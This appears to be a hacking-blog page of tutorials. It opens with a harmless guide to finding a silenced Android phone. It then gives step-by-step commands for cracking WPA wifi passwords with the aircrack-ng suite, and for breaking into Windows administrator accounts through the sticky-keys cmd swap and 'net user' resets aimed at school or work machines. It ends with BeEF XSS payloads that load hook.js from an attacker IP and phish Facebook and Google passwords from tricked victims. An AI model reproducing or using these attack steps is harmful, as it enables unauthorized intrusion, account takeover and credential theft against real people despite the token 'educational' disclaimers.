HOW TO FIND ANDROID PHONE IF LEFT IN SILENT MODE

I think we all know it is very difficult to find your phone when left in silent mode. Most of us start making calls although it doesn’t make any sense if vibration mode  is also off.Now I am going to tell you a better way to find your android device if left in silent mode.

You have to use Google’s official Android Device Manager to locate your phone, here are the simple steps:

1. Go to Android Device Manager by Google in your desktop browser, follow the link HERE.
2. Login with the same Gmail account you used for GOOGLE play store.
3. Now you will see your device name and last login date. Also, you will be seeing three options i.e. Ring, Lock and Erase.
4. By clicking on Ring, your device starts ringing at high volume which help you find your phone in seconds. This function works even when your phone is in silent mode.
   

1. You can also Lock your phone with password if you have lost your device. You have to input a message and a number to make sure whoever finds your phone, can call you back at that number(but nowadays no one i that nice).

1. If the Location services option in your device is turned on, you can find the exact location of the device by clicking on locate service which is at the right side of the device name.
2. You can also delete all the data by clicking on Erase. It’ll perform a factory reset on your device. Your apps, photos, music and settings or every single stuff will be deleted immediately. After you erase the device, Android Device Manager will no longer work. Factory reset setting will start working automatically when your device is online.
   
   

LEARN HOW TO HACK WIFI IN MOST EASY WAY

In this tutorial, I’m going to tell you how to hack wifi.Now, given that we have Kail Linux, open up a terminal window, type in “ifconfig “. This is going to list all the networking interfaces connected to your device.

Here, we need (wlan0) which is our wifi card.So we will disable others by typing ifconfig("name of interface")down.

now we will type "airmon-ng start wlan0"

(airmon-ng is a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring)
It’ll probably show “some processes that could cause trouble”, we’ll simply kill those processes by typing  “kill <process ID>”.

Now if we type "ifconfig" it will only show the monitoring mode "mon0"

Then,type, “airodump-ng mon0”.
In the screenshot below, the highlighted bssid is our target (and it is my own), the channel is 13 as we can see under in “CH” column.

In  next step we will type “airodump-ng –c <channel> -w <name> –bssid <bssid> mon0”.

Let me tell you few things here, “airodump-ng” is a tool for capturing Wi-Fi packets, “<channel>” means the channel your target is running on, “-w” basically writes a file by the name that succeeds it in “<name>”, (I did “handshake” just for the convenience of it) bssid is a string of numbers specific to a hotspot.

Than, open up a new terminal and type “aireply-ng -0 0 –a <bssid> mon0”, this command send a deauthentication signal (usually called a deauth packet) to all the devices connected to that hotspot. Then after few moments stop it by “Ctrl+C”. Now, as we can see, the other terminal shows that the WPA Handshake was successfully captured.

We will close both windows at this point, and open a new one. Type “ls”; that should list the files in the current directory. We can clearly see that the files from the above operation are present. But we only need the file ending with “-01.cap”.

Then open a new terminal type, “aircrack-ng –w <full location of the wordlist> <the file name>”.remember it the file will be ending with .cap.

You may be asking what wordlist? What is that sh*t?
A Wordlist is a file containing thousands of known and possible passwords, which you can download from the internet. The one I used can be found here. The list contains 982,963,904 words exactly all optimized for WPA/WPA2. Would also just like to point out that this is not my work, I got it from forums.hak5.org. It was a guy who compiled a whole load of useful lists, including his own to come up with 2 lists (one is 11gb and one is 2gb) I will be seeding this torrent indefinitely since it is shareware and it's awesome!

It will then start  matching keys in the word list. Now the time it will take completely depend's on the strength of the password. The stronger the password the more time will it take.

After completion it looks something like the screenshot below. In it, you can see that it tested 45688 keys and my key was the 45689th.

Now you can use this passowrd on that wifi network and enjoy.This tutorial is completely for educational purpose.For further tricks.tips and news from world of technology and hacking stay tuned to  hackaklash.blogspot.com

HOW TO BREAK IN ANY ADMINISTRATOR ACCOUNT ON ANY WONDOWS SYSTEM

Have you forgotten your windows password and you are locked out.So don't worry we will 

be helping you to successfuly log in to your administrator account.

Once you get to this screen hold power button until it turns off.

If you would had done it correctly,you will get such tyoe of screen .If not then try again or 

select launch startup  repair.

Let the repair process continue if you get such type of window then click 'cancel'

when you will get this window click on "show problems",scroll down and click the last 
link.notepad wiill popup.

Then go to file/open and double click on the disk in which you have your windows installed.

Now go to windows/system32 Now do exactyl what I say, or you might damage the computer. Under “Files of type,” select “All files.” Scroll down and find “cmd,” then make a copy of "cmd"  in the same folder in which "cmd" is located. You will get a file named “cmd – Copy” or something like that.

 Now find “sethc” in the same folder. This file executes sticky keys. Rename it to “sethc1".

Now rename your “cmd – Copy” to “sethc.” Close notepad, and hit “Finish” to shut down your system, or just restart it manually.

Once you get back to the login screen (where it says “Press Control – Alt – Delete.” Ignore my background, I don’t have that enabled), press “Shift” 5 times to open up the command prompt.
Next, we need to find out who is the user of local administrator for this PC. To do this, type “net localgroup Administrators” and look for any administrator that does not have your school/work domain in front of it, followed by a “/.” As you can see, one of the admins is named “qwaszx.” You will probably see a name like this, since schools/workspaces tend to make it a random string of letters and/or numbers to  avoid  people from entering it.

Now, we need to change that account’s password. Type “net user <ACCOUNT NAME HERE> *” and type the new password twice. It will not show what you’re typing, but your keystrokes are being registered. You can now log in to your admin account. However, schools/workspaces also like to disable the admin account you just changed the password for, so you might not be able to log in. There is a simple fix. If you get that message,then do extra step.

If the admin account is disabled, type “net user <ACCOUNT NAME HERE> /active:yes” You will now be able to log in

Now enjoy you have full rights to use it
WARNING:we will not be held responsible for any misuse.It is purely for educational purpose

HACKING SOCIAL MEDIA SITES USING BEEF

The best tool I’ve seen to be used with different XSS attacks is called the BeEF Exploitation
Framework.f you do find a valid XSS on a site, you will need to craft your XSS findings to utilize the BeEF Framework.
 Starting BeEF Commands:

1.cd/usr/share/beef-xss./beef

Let’s log into the console UI after the BeEF server has started. As we see from the image above, the
UI URL in this case is located at http://127.0.0.1:3000/ui/authentication. We can open a browser and
go to that URL.

 If we look at the image where we loaded BeEF via command line, we saw both a URL
for the UI page and the hook page (Hook URL). Let’s take a quick second and review the hook page
(hook.js).

Although this JavaScript has been well obfuscated, this is the payload that will control the victim user
and will be injected into the victim browser ’s page. Once injected, their browser will connect back
into your central server and the victim will be unaware.

So if we have located an XSS vulnerability on a page, we can now use BeEF to help with the
exploitation of the end user. In our initial example, http://securepla.net/xss_example/example.php?
alert=, the alert variable takes any input and presents it to the end user. We can manually add our
JavaScript code here and send the link to our unsuspecting user. In the example below, I print out the
user’s DOM cookies using the JavaScript code:

<script>alert(document.cookie)</script>

This proves that the end user does process the JavaScript code embedded from our query. To create a
successful exploit, instead of printing the cookies, we are going to craft a URL that uses JavaScript to
include the hook.js file. It will look something like: http://securepla.net/xss_example/example.php?
alert=asda<script src=http://192.168.10.91:3000/hook.js></script>. I was able to append the hook.js
script by using the JavaScript code:

<script src=[URL with hook.js]></script>
Remember that if this is done on a public site then the URL will need to be pointing to a public
address hosting the hook.js page and listening service.

Once you trick a victim to go to that URL using Social Engineering Tactics , they will be part of your
XSS zombie network. Going back to our UI panel, we should now see a victim has joined our server.

With an account hooked, there are many different modules within BeEF to exploit the end user. As
from the image above, you can try to steal stored credentials, get host IP information, scan hosts
within their network, and so much more.


One of my favorite attacks is called “petty theft” because of how simple it is. Drop down to Social
Engineering folder and to Petty Theft. Configure how you want it, in this case we’ll use the Facebook
example, and hit execute. Remember the IP for the custom logo field has to be your BeEF IP. This is
so the victim can grab the image from your server.

After the attacker clicks submit, on the victim’s system a Facebook password prompt will pop up.
This is where you can get creative in targeting your users and use a popup that they would most likely
enter. If you are looking to gain Google accounts, there is also a Google Phishing module. The
purpose of this client side attack is that they are unaware that they are part of this zombie network and
the password prompt should seem like it is not out of the ordinary.

After the unsuspecting victim types in their password, go back to the UI to find your loot. Clicking on
the id 0 will show the attacker what the victim typed into that box. This should be enough to start
gaining some access as the user and move laterally throughout the environment.

I hope I was able to demonstrate how powerful an XSS vulnerability can be.

Here is a video showing you got to bypass the lockscreen of an Iphone 5S and get access to some of the features such as the users saved photos and videos.